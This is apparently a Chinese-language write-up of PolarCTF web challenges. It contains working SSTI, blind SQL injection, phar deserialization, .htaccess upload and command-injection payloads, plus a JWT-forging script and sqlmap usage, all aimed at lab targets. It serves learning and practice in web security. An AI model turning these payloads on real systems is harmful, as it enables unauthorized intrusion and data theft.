Top10大考察
好多功能啊,都想试试
| 功能 | URL | 说明 |
|---|---|---|
| 主页 | home.php | 显示我的笔记列表 |
| 新建笔记 | note.php | 创建/查看/删除笔记,参数 ?id=N |
| 搜索 | search.php | 搜索笔记,参数 ?q=keyword,提示"已启用WAF" |
| 文件上传 | upload.php | 上传图片或 .url 文件 |
| 文件分享 | share.php | 查看已上传文件内容,参数 ?file=path |
尝试路径遍历
share.php?file=../../../flag.txt,返回:
路径遍历攻击已被拦截!
尝试 ....//、%2e%2e%2f 等 bypass 均被拦截
尝试sql
提示"已启用 WAF 防护"。测试:
- ' OR 1=1-- - → 返回空结果(无报错,可能参数化查询或被过滤)
- ' UNION SELECT 1,2,3-- - → WAF拦截!
- UN/**/ION SEL/**/ECT → 绕过WAF但依然空结果尝试SSTI
{{7*7}}原样显示
尝试文件上传
仅允许上传 jpg/jpeg/gif/png 图片和 .url 快捷方式文件。图片上传检验 MIME 类型。
.url 文件格式是Windows快捷方式文件
[InternetShortcut]
URL=file:///flag访问 share.php?file=uploads/{hash}.url,返回:
<pre>flag{SSRF_WAF_Byp4ss_Curl_Url_2026Summer}</pre>偷吃蟠桃
小游戏玩一下,第二关要1000000分才能拿flag,但总分全拿到也没这么多
查看源代码,找到传参格式
我们POST
score=1000000&level=2&passed=1拿到flag
狗黑子的股市之路
抓包看看,设置负数没反应,repeat重新发包金额也不变
扫目录发现有flag.php能兑换flag但提示资金不足
不过抓flag.php兑换flag的包发现post传参check=no
改成check=yes就拿到flag了
路飞的HTTP协议冒险
第一关要吃肉,点击一次吃一块
抓包改meat=999就ok
然后第二关说
香克斯:路飞,你需要获得橡胶(rubber)的力量(power)才可以变强。
半天想不出来是什么
应该是get请求
/devil_fruit.php?power=rubber进入下一关
血液流速: 过低 ✖
限制器状态: 未解除 ✖拿hint
罗宾:路飞,你需要让血液(blood)加速(boost),并将身体机能的限制(limit)解除(unlock)来进入二档打败cp9.post传参
blood=boost&limit=unlock提示二档开启成功
进入下一关
拿hint
弗兰奇:路飞,男人就该用点"特别的方式"沟通!比如带上值为 BoneInflate的请求头X-Luffy-Gear3.加http头
X-Luffy-Gear3: BoneInflate进入下一关,拿hint
雷利:路飞,修行的证明,往往留在浏览器里。你需要gear4和Trainer的认证,记住,我是海贼王罗杰的副手Rayleigh,期待着你化身BoundMan的模样认证?抓包看看没有东西,加个cookie试试
gear4=BoundMan; Trainer=Rayleigh进入最后一关
在甚平的注视下,你试图清除那段盘踞心底的战争阴影。
可这道封印并不像刀剑可斩、火焰可焚。
它仿佛在等待一种更"准确"的确认。
当前状态: 封印仍存在 ✖
本次方式: GET
净化受阻
这道封印并不排斥你的到来,但它不会因旁观而消散。 hint
甚平:路飞,清除之前,先确认它仍是当前状态。否则,这道封印不会接受你的请求。不知道改干嘛了
注意到回显中有本次方式:GET
改成POST请求,回显也相应变成POST
那换成DELETE呢?
当前状态: 封印仍存在 ✖
本次方式: DELETE
条件确认: 缺失 ✖
净化失败
甚平低声道:真正的斩断,不是盲目出手。先确认你面对的,正是当前这一道封印。 要确认面对的是当前这一道封印...
换成PUT
方式错误
你尝试了某种方式,但这道封印并不会对此作出回应。其他的请求方法也都一样
其实问题出在响应头
Etag: "seal-memory-v1"Etag通常用来作为当前资源的实体标签(需要用来确认状态)
结合要确认你面对的正是这一道封印
| 需求 | 对应的请求头 |
|---|---|
| 确认资源没变再读取 | If-None-Match |
| 确认资源没变再修改/删除 | If-Match |
| 确认资源没变再读取(时间版) | If-Unmodified-Since |
使用If-Match头
If-Match: "seal-memory-v1"请求方法设为DELETE
flag{15b606dc5a9492c260984aa627338bfd}dariy
首页好大的字
Record your thoughts with our fancy template system直接七七四十九发现成功
尝试拿flag,有waf
paylaod
{{ (url_for|attr('\x5f\x5fglobals\x5f\x5f'))['sys'].modules['builtins']|attr('open')('/flag')|attr('read')() }}构造思路:
我先测了 {{url_for}},能正常回显,说明它可以当跳板。
然后用 attr 过滤器去读它的 globals:
{{url_for|attr('\x5f\x5fglobals\x5f\x5f')}}
这里的 \x5f 是下划线 _,作用是避免在原始输入里直接出现 globals 这种明显特征。
这里返回的是一个全局字典,里面直接有 sys,于是可以走:
{{(url_for|attr('\x5f\x5fglobals\x5f\x5f'))'sys'}}
再用 sys.modules 拿已经加载的模块。这里我不走 os.popen,因为 WAF 会拦 popen 相关链路。
最终选择 builtins.open
{{(url_for|attr('\x5f\x5fglobals\x5f\x5f'))'sys'.modules'builtins'|attr('open')('/flag')|attr('read')()}}
你会渗透吗
用提示的测试账号登录
抓下载图片的http包
/api.php?action=download&file=picture/%E7%AC%AC%E4%B8%80%E6%AC%A1%E7%9B%B8%E9%81%87.png第一次相遇.png
疑似任意文件下载?
下载index.php
php
<?php
session_start();
if (isset($_SESSION['user_id'])) {
header('Location: /home.php');
exit;
}
?>home.php
php
<?php
session_start();
if (!isset($_SESSION['user_id'])) {
header('Location: /index.php');
exit;
}
$username = $_SESSION['username'];
$role = $_SESSION['role'];
// 如果是admin,显示flag页面
if ($role === 'admin') {
header('Location: /admin.php');
exit;
}
// 如果是Squirtle,显示个人主页
if ($username === 'Squirtle') {
header('Location: /squirtle.php');
exit;
}
?>下载admin.php,拿到flag
flag{4323ce6fff96d58cfd37f18747e28c18}身份权限校验系统
身份权限校验系统
当前权限:普通用户
提示:参数中不能出现 admin 关键字
抓包扫目录都没有收获
看源代码发现一句话
CTF 变量覆盖挑战
不懂
尝试传有关于admin的参数
最终index.php?is_admin=1
七人组档案
点击查看支线剧情
听着,小子
沃特在暗网藏了个心理评估终端。
祖国人快失控了,那个终端里有初代化合物V的位置。
帮我去一趟。但有个破防火墙挡着。
网页源码里留了点东西,自己找。
找到之后,潜入到他们的系统内部,破解最终初代化合物V的位置!扫目录没有收获,看源代码
<!-- hint ----------------------------------------------------------------->
<button hidden onclick="jumpToTarget()">线索</button>
</div>
</div>
<div class="slogan">
<div class="divider"></div>
<div class="slogan-text">
"超级英雄不是问题,问题是------<span>谁在控制他们</span>?"
</div>
<div class="divider" style="margin-top: 40px;"></div>
</div>删掉hidden onclick="
出现新的按钮,点击
听着,小子
沃特那破安全系统会检查 User-Agent,但有个叫 X-Vought-Token 的头它们懒得拦
假装你是内部的人------用祖国人(Homelander)的身份混进去!使用X-Vought-Token: Homelander访问
查看来信
很好,小子
你已经成功进入了沃特公司的内部系统!
他们的数据库查询系统存在严重漏洞,就看你的了!
如果你想获得最高权限:。
找出沃特公司老总的账号和密码
他叫什么来着...斯坦埃德加(StanEdgar)?使用查询功能
输入数字,回显
禁止输入一切数字和过滤字符串!(=/ascii/所有截取字符串的函数)输入aa回显404
输入true空白回显
提示true会代替一切,布尔盲注吗
python sqlmap.py -u http://4e64025f-3383-4b99-82dd-c9e6afb64ba3.www.polarctf.com:8090/level1/Vought_Internal_system1917.php?id=111 -H "X-Vought-Token: Homelander" --level=1 --risk=3 --batch跑不出来
尝试以下payload
sql
true and (select database()) like '{result + j}%'
#vought
true AND EXISTS(SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA LIKE 'vought' AND TABLE_NAME LIKE '{result + j}%')
#members
true AND (SELECT GROUP_CONCAT(COLUMN_NAME) FROM information_schema.columns WHERE TABLE_SCHEMA LIKE 'vought' AND TABLE_NAME LIKE 'members')LIKE '{result + j}%'
#id,member,keyword
true AND (SELECT GROUP_CONCAT(member,keyword) FROM members)LIKE '{result + j}%'
#homelanderqgxmyznp,queenmaeveftrhwjkc,atrainbksqadme,stanedgarzpexnlot.....
py
import requests
import string
url = "http://4845c17a-356f-423f-bed6-da4261f41b45.www.polarctf.com:8090/level1/Vought_Internal_system1917.php?id="
result = ""
for i in range(1, 100):
for j in string.ascii_letters + '_' + ',':
payload = f"true and (select database()) like '{result + j}%'"
re = requests.get(url=url + payload)
if '404' not in re.text:
result += j
print(result)
break写脚本的时候有个小问题,最开始我的脚本爆破使用
py
for j in string.ascii_letters + string.digits + '_' + ',':问题是这道题的输入有数字就会提示被过滤,这样也满足'404' not in re.text:
爆破结果就会带着一个0,然后再爆破下一位
爆破到第一个a,由于payload中有数字,依旧满足'404' not in re.text:,最后输出就会变成0aaaaaaaaaaaaaaaaa
payload构造的时候也有小问题,网页版ds给出的payload是
sql
true AND EXISTS(SELECT COLUMN_NAME FROM information_schema.columns WHERE TABLE_SCHEMA LIKE 'vought' AND TABLE_NAME LIKE 'members' AND COLUMN_NAME LIKE '{result + j}%')我们的预期回显是id,member,keyword
但是这个payload判断的是exists
按照字母顺序,a%匹配字段首字母,轮到i的时候匹配到了id
但是我们用的是COLUMN_NAME LIKE=来匹配,只匹配单个列的列名
id之后再跟任何东西,这个整体都不是一个列名
登录
我们拿最后一个payload的回显
stanedgarzpexnlotGROUP_CONCAT(member,keyword)
账号stanedgar
密码zpexnlot
登陆后查看五号化合物坐标
JWT令牌格式错误!需要三段式: header.payload.signature还是先查看源代码吧
提示role权限不够
把cookie中role改为admin即可
php
<?php
highlight_file(__FILE__);
// ==================== 简单JWT实现 ====================
function base64url_encode($data)
{
return rtrim(strtr(base64_encode($data), '+/', '-_'), '=');
}
function base64url_decode($data)
{
return base64_decode(strtr($data, '-_', '+/'));
}
// JWT签名密钥 (藏在源码里,你有本事就自己签一个令牌!)
$jwt_secret = "Vought_CompoundV";
if (isset($_POST['location'])) {
$token = $_COOKIE['jwt_token'] ?? '';
if (empty($token)) {
echo '<script>alert("缺少JWT令牌!请先获取有效的jwt_token");</script>';
} else {
$parts = explode('.', $token);
if (count($parts) !== 3) {
echo '<script>alert("JWT令牌格式错误!需要三段式: header.payload.signature");</script>';
} else {
$header = json_decode(base64url_decode($parts[0]), true);
$payload = json_decode(base64url_decode($parts[1]), true);
// 计算有效签名
$valid_sig = base64url_encode(hash_hmac('sha256', "$parts[0].$parts[1]", $jwt_secret, true));
if ($header === null || $payload === null) {
echo '<script>alert("JWT解析失败!header和payload需要是有效JSON的Base64URL编码");</script>';
} elseif (!hash_equals($valid_sig, $parts[2])) {
echo '<script>alert("JWT签名验证失败!密钥不匹配");</script>';
} elseif (!isset($payload['access']) || $payload['access'] !== 'compound_v') {
echo '<script>alert("JWT权限不足!需要 access = compound_v");</script>';
} else {
//......
}
}
}
}我们尝试自己签名
php
<?php
function base64url_encode($data) {
return rtrim(strtr(base64_encode($data), '+/', '-_'), '=');
}
$jwt_secret = "Vought_CompoundV";
$header = json_encode(['alg' => 'HS256', 'typ' => 'JWT']);
$payload = json_encode(['access' => 'compound_v']);
$b64_header = base64url_encode($header);
$b64_payload = base64url_encode($payload);
$signature = hash_hmac('sha256', "$b64_header.$b64_payload", $jwt_secret, true);
$b64_signature = base64url_encode($signature);
$jwt = "$b64_header.$b64_payload.$b64_signature";
echo $jwt;
#eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhY2Nlc3MiOiJjb21wb3VuZF92In0.ANdvTV4XOHONEhUhUuujsWO06tDdNzM-qR8MPXxH9Qk拿到坐标
40.7128,-74.0060_VoughtTower_B73_FounderVault_CompoundV_Original交给布彻尔
他说坐标的md5就是flag
flag{dee804d0504af6a1cdce236481eee802}Escape, escape!
感觉功能有点多,大体浏览一遍
历史环境仍保留仅供内网排障的调试组件
如需模板表达式预览或历史内容回放,请遵循内部流程,不建议直接暴露在公共入口后方。 这句话有点意思
可能需要用历史环境找flag
.....做不出来
Polar_校园图库
文件上传,文件预览
看一眼源码,发现view.php有
php
require_once('classes.php');并且classes.php
php
<?php
class Helper {
public $type;
public $cmd;
function __destruct() {
if ($this->type === 'eval') {
eval($this->cmd);
}
}
}
?>我们尝试上传一个含有序列化内容的图片,使用phar伪协议读取
php
<?php
// 漏洞测试用的恶意 PHAR
class Helper {
public $type;
public $cmd;
function __destruct() {
if ($this->type === 'eval') {
eval($this->cmd);
}
}
}
// 创建 PHAR
$phar = new Phar('999.phar');
$phar->startBuffering();
// 设置 stub,添加gif头
$phar->setStub("GIF89a" . "<?php __HALT_COMPILER(); ?>");
// 添加普通文件(必须至少有一个文件)
$phar->addFromString('readme.php', 'This is a test file');
// 设置元数据 - 会被序列化存储
$payload = new Helper();
$payload->type = 'eval';
$payload->cmd = 'system("cat /flag*");';
$phar->setMetadata($payload);
$phar->stopBuffering();修改后缀为.png
view.php只接收后缀为.php的参数
讲一下这个路径
view.php?file=phar://uploads/c715a557277a6af0069be7996953b1ea.png/readme.php如果c715a557277a6af0069be7996953b1ea.png是普通文件,这样请求会报错
但如果他是一个phar文件,这个路径就会访问.phar文件内部的readme.php文件
我们的回显是
This is a test fileflag{polar_in_0606_school} 前半段是.phar文件内部的readme.php,后半段是触发反序列化得到的结果
flag{polar_in_0606_school} uploadfile
经典文件上传,把常见payload过一遍
含有明显php特征的被识别
<script language="php">echo `ls`;</script>
GIF89a
echo file_get_contents($_GET['f'] ?? '/flag');均能成功上传,但不可访问
上传.htaccess后
AddType application/x-httpd-php .jpg可以访问,但没有被执行
其实还有一种方法,把命令进行base64编码
PD9waHAgc3lzdGVtKCJscyAvIik7Pz4=再在.htaccess后拼接一句
php_value auto_prepend_file "php://filter/convert.base64-decode/resource=55.jpg"访问上传的文件
bin dev etc home lib linuxrc media mnt proc root run sbin srv sys thisisfl@g.php tmp usr var PD9waHAgc3lzdGVtKCJscyAvIik7Pz4=同理,读取thisisfl@g.php
(没有回显,flag藏在源码里)
flag{9ba9ef6ddfbe14916fa2d3337b427774}BH
==== It's another order execution. ====
Carefully look at the purpose of the code before executing any code
System executing command:
ping -c 2 127.0.0.1
PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: seq=0 ttl=42 time=0.031 ms
64 bytes from 127.0.0.1: seq=1 ttl=42 time=0.041 ms
--- 127.0.0.1 ping statistics ---
2 packets transmitted, 2 packets received, 0% packet loss
round-trip min/avg/max = 0.031/0.036/0.041 ms
<?php
error_reporting(0);
echo "==== It's another order execution. ====<br>";
echo "Carefully look at the purpose of the code before executing any code<br><br>";
$input = $_GET['cmd'];
$command = "ping -c 2 127.0.0.1" . $input;
echo "System executing command:<br>$command<br><br>";
echo "<pre>";
passthru($command);
echo "</pre>";
highlight_file(__FILE__);
?>?cmd=;ls
发现有flag.php,直接cat
依旧不显示,藏在源代码中
flag{030e77f73a4cb26a111daf0470c3956f}